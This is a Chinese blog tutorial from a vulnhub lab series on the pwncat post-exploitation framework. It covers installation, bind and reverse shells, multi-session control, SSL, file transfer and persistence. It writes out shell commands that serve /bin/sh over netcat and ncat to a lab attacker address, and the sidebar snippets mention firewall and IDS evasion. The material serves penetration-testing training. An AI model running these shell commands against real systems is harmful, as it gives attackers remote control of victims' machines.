工具使用-pwncat

最新推荐文章于 2024-05-24 18:40:24 发布
最新推荐文章于 2024-05-24 18:40:24 发布
阅读量990 收藏 20
点赞数 23
分类专栏: vulnhub 文章标签: 信息安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yutianovo/article/details/136332334
版权
文章介绍了pwncat,一个强大的命令和控制框架,提供反向shell、本地Shell界面、自动化功能,包括文件上传/下载、权限维持和SSL加密。指南详细说明了如何安装、使用bindshell、反向shell获取以及管理多台主机和SSH连接。
摘要由CSDN通过智能技术生成

pwncat是一个命令和控制框架,可以将基本的反向或绑定shell转化为一个功能齐全的利用平台。然后,它将尝试在远程主机上启动一个伪终端,并为您提供原始终端访问。
但pwncat不止于此。除了自动的获取全交互式终端外,pwncat还提供了一个本地Shell界面,可以用来使用自动枚举模块、自动持久化,甚至自动提权,文件上传/下载。

当在获取到一个基本的反向 shell 后,还需要做以下步骤来防止终端意外退出。

python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm

Ctrl + Z

export TERM=xterm

stty rows 38 columns 116

当输入这几天命令后才能防止 Ctrl + C 意外结束。遇到上传/下载文件还需要使用 python 开启一个临时的 http 服务器。

而现在这些步骤都可以被 calebstewart/pwncat: Fancy reverse and bind shell handler 来自动实现。

pwncat 使用

安装

对于仅只用的,推荐下面的命令安装

python3 -m venv pwncat-env
source pwncat-env/bin/activate
pip install pwncat-cs

对于开发环境,使用这里的命令安装

# Setup pwncat inside a poetry-managed virtual environment
git clone https://github.com/calebstewart/pwncat
cd pwncat
poetry install

# Enter the virtual environment
poetry shell

bind shell 获取

首先在受害者机器输入下面的命令,这条命令会将 /bin/sh 绑定到 4444 端口

nc -lvp 4444 -e /bin/sh

接下来使用 pwncat 连接

pwncat-cs 目标ip 目标端口
pwncat-cs 192.168.99.136 4444

反向 shell 获取

在攻击机开启监听端口 4444

当在受害者连接到攻击机时,将返回 shell

此时是本地交互终端(控制台),以 local 作为标志。
这里可以切换多个控制的主机、文件上传/文件下载、模块自动利用等。

进入到被控机器

对于一台主机,可以使用 Ctrl + D 键进入被控机器,以 remote 为标志。再次按 Ctrl + D 将返回本地交互终端。

多台主机控制

首先开启监听,这将在后台监听 4444 端口的连接。

在受害者连接监听端口 4444,这样将会有两台主机。

使用 session id 的方式切换被控机

使用 listeners 可以看到正在监听的端口,此时监听的端口可以接收多台主机。

也可以使用参数来限制上线数量。使用 -c 来限制数量,这样 1234 端口将仅限被连接两次。

listen -c 2 -m linux 1234

这里可以看到,第三次连接失败了。

需要注意的使,当 pwncat 程序退出后,将丢失所有会话

开启 ssl 加密

通过 wireshark 抓包可以看到,流量是明文的

pwncat 还支持 ssl,下面将介绍开启 ssl 连接的步骤。
创建一个支持 ssl 的监听器,这将会自动创建一个自签名的 ssl 证书。

使用支持 ssl 连接的 nc 来连接目标端口。

ncat --ssl 192.168.99.136 4444 -e /bin/sh

此时与会话1的交互将是被加密的,4444 -> 33644 流量加密,1234 -> 48548 明文传输。

而会话 0 是明文连接。

文件下载/文件上传

文件下载

pwncat 使用 lcd 来切换 的目录,创建一个 pwncat-loot,使用 lcd 切换到此目录。

使用 download 下载文件将会下载到工作目录 pwncat-loot。

文件上传

将要上传的文件复制到 pwncat-loot。

使用 upload 上传到被控机器。

ssh 连接

除了正向、反向外,还支持 ssh 连接

这样就可以使用 pwncat 来管理多个 ssh 会话了

linux 权限维持自动化模块

此外 pwncat 还有一些好用的模块,可以用来权限维持。

赛博雨天
关注
  • 23
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwncat:花式反向绑定外壳处理程序
03-19
pwncat pwncat是用于Linux目标的开发后平台。它最初是作为基本绑定和反向shell的包装,并且从那里开始发展起来的。它可以在从攻击者计算机而不是目标计算机暂存代码的同时简化常见的红队操作。 pwncat拦截与远程外壳的原始通信,并允许用户在远程主机上执行自动操作,包括枚举,持久性安装甚至特权升级。 收到连接后,pwncat将设置一些通用配置以用于远程Shell。 在远程外壳中禁用历史记录 标准化shell提示 找到有用二进制(使用which ) 尝试生成一个伪终端(pty)进行完整的交互式会话 pwncat知道如何使用几种不同的方法生成pty,并将使用先前列举的可执行文件对这些方法进行交叉引用。生成pty后,它将在原始模式下设置控制终端,因此您可以以类似于ssh方式进行交互。 pwncat还将使远程pty设置(例如行,列, TERM环境变量)与您的本地设置同步,以确保s
pwncat:pwncat-使用防火墙,IDSIPS规避,绑定和反向外壳,自注入外壳和端口转发魔术的类固醇上的netcat-以及可完全用Python(PSE)编写的脚本
04-28
| | | | | | | pwncat Netcat支持类固醇,具有防火墙,IDS / IPS规避,绑定和反向外壳,自注入外壳和端口转发魔术-以及可完全用Python( PSE )编写的脚本。 代码风格 集成测试[2] 造型器 地位 黑色的 py [1] pycodestyle pydocstyle 皮林特 Python操作系统 Linux 苹果系统 视窗 2.7 3.5 3.6 3.7 3.8 pypy2 pypy3 [1] mypy类型覆盖率(完整输入:93.97%) [2]构建失败并不表示功能已损坏。 集成测试运行多个小时,并由于各种不同的原因(网络超时,GitHub Action的未知取消等)而偶尔中断: #735 , #841 动机 您是否曾经偶然在您的反向外壳上按Ctrl + c并永久消失了? 是否曾经因为防火墙没有让客
探索 `pwncat`: 动态渗透测试框架的革新
gitblog_00077的博客
04-25 387
探索 pwncat: 动态渗透测试框架的革新 项目地址:https://gitcode.com/calebstewart/pwncat 项目简介 pwncat 是一个由 calebstewart 开发的现代、动态的渗透测试框架。该项目旨在提供一个强大且灵活的平台,用于进行安全评估和漏洞利用。通过 Gitcode(https://gitcode.com/calebstewart/pwncat),你可...
Python pwntools学习
PUTAOAO的博客
10-13 414
首先下载pwntools pwntools 也可以用pip装:pip install pwn 在python中调用 from pwn import * 连接 send(data) : 发送数据 sendline(data) : 发送一行数据,相当于在末尾加\n recv(numb=4096, timeout=default) : 给出接收字节数,timeout指定超时 recvuntil(delims, drop=False) : 接收到delims的pattern (以下可以看作until的特例) re
探索网络安全新边界:pwncat 开源项目
gitblog_00029的博客
05-13 428
探索网络安全新边界:pwncat 开源项目 项目地址:https://gitcode.com/cytopia/pwncat 在网络安全领域,一款强大的工具往往能为攻防战带来显著优势。今天,我要向您推荐一个名为pwncat的开源项目,它是Netcat的升级版,具备了防火墙穿越、IDS/IPS规避、自注入shell和端口转发等高级功能,并且完全支持Python脚本化。 项目介绍 pwncat是一个集成...
安全界瑞士军刀--Netcat常用命令
weixin_43456810的博客
11-29 968
瑞士军刀Netcat常用命令 1. 查看目标IP地址的指定的端口是否开启 如: nc -nv 11.11.11.11 80 //判断80端口是否开启 -nv是信息收集过程中经常使用的参数,在nmap也经常会用到 -n: 对IP地址进行探测,但不会对域名进行探测,即没有DNS的解析 常见的端口的开启特征 110端口: 如果开启,可以尝试输入USER 用户名等命令 25端口: 如果开启,可以先输入helo指令进行对话,之后再输入邮箱等 80端口: 如果开启,可以输入GET /命令或者 HEAD/ 命令 2. 利
全新kali搭建pwn环境(超详细截图)
最新发布
m0_73927535的博客
05-24 962
可能会用到的命令:删除目录rm -rf 目录名下面所有安装操作最好都在root用户同一目录(~)下cd ~安装报这个错误是自己网络问题,我连的校园网后来换热点就好了。kali源和pip源不一样两个都最好换源,不换可能会报错,换了下载速度也快。
ncat使用总结
weixin_34082854的博客
03-01 1034
功能 1. 监听本地端口 2. 连接目标端口 3. 传送文件 4. Remote Administration with Netcat(OSCP中给的分类,不知道此分类的作用,需要深入学习) 5. 反弹shell 6. 测两台机器间的网速 监听本地端口 # 临时监听端口 nc -l <PORT> # 临时监听TCP端口一次 nc -lu <PORT> # 临时监听UDP端口...
vulnhub-So Simple 1
yutianovo的博客
08-10 1298
靶机描述 This is an easy level VM with some rabbitholes. Enumeration is key to find your way in. There are three flags (2 user and 1 root flag). The VM is tested on Virtualbox. After the startup it shows the IP address. Share your rootflag with me on Twitter
vulnhub-Tiki - 类oscp靶机攻略1
yutianovo的博客
07-14 1236
本文为类oscp靶机打靶1
vulnhub-Cybox: 1.1
yutianovo的博客
12-25 1064
靶机描述 http://blog.yutian233.xyz/index.php/archives/72/ Will you be able to compromise the internal server of the CYBOX company? Difficulty: Medium Objective: Get user.txt and root.txt This works better with VirtualBox rather than VMware. Contact: @takit
vulnhub-DevGuru:1
yutianovo的博客
12-24 909
靶机描述 DevGuru is a fictional web development company hiring you for a pentest assessment. You have been tasked with finding vulnerabilities on their corporate website and obtaining root. OSCP like ~ Real life based Difficulty: Intermediate (Depends on exp
vulnhub-Photographerr-渗透笔记
yutianovo的博客
08-04 854
靶机描述 博客地址 http://blog.yutian233.xyz/ This machine was developed to prepare for OSCP. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and proof.txt. https://www.vulnhub.com/entry/photographer-1,519/ 端口扫描 nmap -A -p
vulnhub-Potato-wp
yutianovo的博客
09-13 604
靶机描述 blog http://blog.yutian233.xyz/ VM name : Potato Type: Boot to Root DHCP : Enabled Difficulty : Easy to medium Goal: 2 flags (user.txt and root.txt) This VM has been tested with VirtualBox 下载 https://www.vulnhub.com/entry/potato-1,529/ 清单 信息搜集 ne
vulnhub-BBS (CUTE): 1.0.1-cute
yutianovo的博客
09-25 582
http://blog.yutian233.xyz/index.php/archives/63/ 靶机描述 Machine name: BBS (Bulletin Board System) Level: Easy->Intermediate flags: user, root Description: really technical machine, if you are ready for certifications it will be a good tool to test your
vulnhub-Mercury
yutianovo的博客
09-27 547
靶机描述 Difficulty: Easy Mercury is an easier box, with no bruteforcing required. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值